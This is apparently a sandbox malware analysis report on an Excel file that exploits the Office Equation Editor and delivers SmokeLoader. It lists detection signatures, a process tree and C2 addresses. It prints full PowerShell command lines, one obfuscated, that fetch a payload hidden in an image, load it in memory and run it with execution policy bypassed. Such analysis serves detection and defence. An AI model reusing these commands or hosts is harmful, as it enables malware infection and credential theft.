Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#20240627_Edlen_A.xls

Overview

General Information

Sample name:#20240627_Edlen_A.xls
Analysis ID:1448086
MD5:74cb59a86f4df8375836fd2bc3bbfd08
SHA1:11745387b652df3e64697fc430d207251fb70fdd
SHA256:72701fd89271a881e14bfb170ee86d28f5c08fdb73f1be8c6904337c102bf7d7
Tags:xls
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2772 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1020 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3348 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3420 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3912 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3124 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3196 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3208 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3324 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3388 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3352 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • taskeng.exe (PID: 4004 cmdline: taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rugtucw (PID: 4036 cmdline: C:\Users\user\AppData\Roaming\rugtucw MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x693:$obj2: \objdata
  • 0x67b:$obj3: \objupdate
  • 0x656:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x693:$obj2: \objdata
  • 0x67b:$obj3: \objupdate
  • 0x656:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
      0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          13.2.RegAsm.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            12.2.powershell.exe.82d0000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

              Exploits

              barindex
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.177.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs

              Spreading

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

              System Summary

              barindex
